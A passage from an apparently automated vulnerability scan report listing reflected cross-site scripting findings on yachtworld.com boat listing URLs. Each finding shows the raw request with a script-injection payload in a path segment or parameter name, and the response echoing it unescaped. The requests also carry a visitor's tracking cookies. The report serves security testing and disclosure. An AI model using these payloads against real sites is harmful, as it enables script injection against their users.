Set-Cookie: VIEWED_BOATS_STORE=2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 31915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
low" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2194614&boat_id=2194614&back=/core/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD7ce29"><script>alert(1)</script>37b663f625a/United-States&boat_id=2194614">
...[SNIP]...

3.152. http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dab14"><script>alert(1)</script>f70b07ba505 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-Statesdab14"><script>alert(1)</script>f70b07ba505 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; s_pers=%20s_nr%3D1296155975932%7C1298747975932%3B%20s_lv%3D1296155975933%7C1390763975933%3B%20s_lv_s%3DFirst%2520Visit%7C1296157775933%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.4.10.1296155952; VIEWED_BOATS_STORE=2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:41:06 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 19 Jan 2011 16:33:04 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:41:06 GMT
Set-Cookie: VIEWED_BOATS_STORE=2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 31915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
re/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2194614&boat_id=2194614&back=/core/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-Statesdab14"><script>alert(1)</script>f70b07ba505&boat_id=2194614">
...[SNIP]...

3.153. http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 839fa"><script>alert(1)</script>ca2cebf3c7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States?839fa"><script>alert(1)</script>ca2cebf3c7b=1 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; s_pers=%20s_nr%3D1296155975932%7C1298747975932%3B%20s_lv%3D1296155975933%7C1390763975933%3B%20s_lv_s%3DFirst%2520Visit%7C1296157775933%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.4.10.1296155952; VIEWED_BOATS_STORE=2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:56 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 19 Jan 2011 16:33:04 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:39:55 GMT
Set-Cookie: VIEWED_BOATS_STORE=2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 30759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?839fa"><script>alert(1)</script>ca2cebf3c7b=1&slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2194614&boat_id=2194614&back=/core/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States&boat_id=2194614">
...[SNIP]...

3.154. http://www.yachtworld.com/boats/2007/Regulator-Center-Console-2030806/VA/United-States [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2007/Regulator-Center-Console-2030806/VA/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffece"><script>alert(1)</script>0b7ee9c65c0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2007/Regulator-Center-Console-2030806/VAffece"><script>alert(1)</script>0b7ee9c65c0/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:49 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 07 Sep 2010 20:17:05 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2030806%5B%25%5D32%27+Regulator+Center+console%5B%25%5DUSD%26nbsp%3B159%2C500%5B%25%5DVA%2C+United+States%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F0%2F3%2F0%2F8%2F2030806_9_mini.jpg%3F1281995171000%5B%25%5D%2Fboats%2F2007%2FRegulator-Center-console-2030806%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:49 GMT
Set-Cookie: VIEWED_BOATS_STORE=2030806%5B%25%5D32%27+Regulator+Center+console%5B%25%5DUSD%26nbsp%3B159%2C500%5B%25%5DVA%2C+United+States%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F0%2F3%2F0%2F8%2F2030806_9_mini.jpg%3F1281995171000%5B%25%5D%2Fboats%2F2007%2FRegulator-Center-console-2030806%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2030806&boat_id=2030806&back=/core/boats/2007/Regulator-Center-Console-2030806/VAffece"><script>alert(1)</script>0b7ee9c65c0/United-States&boat_id=2030806">
...[SNIP]...

3.155. http://www.yachtworld.com/boats/2007/Regulator-Center-Console-2030806/VA/United-States [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2007/Regulator-Center-Console-2030806/VA/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8f87"><script>alert(1)</script>8d9b62f2e71 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2007/Regulator-Center-Console-2030806/VA/United-Statesd8f87"><script>alert(1)</script>8d9b62f2e71 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 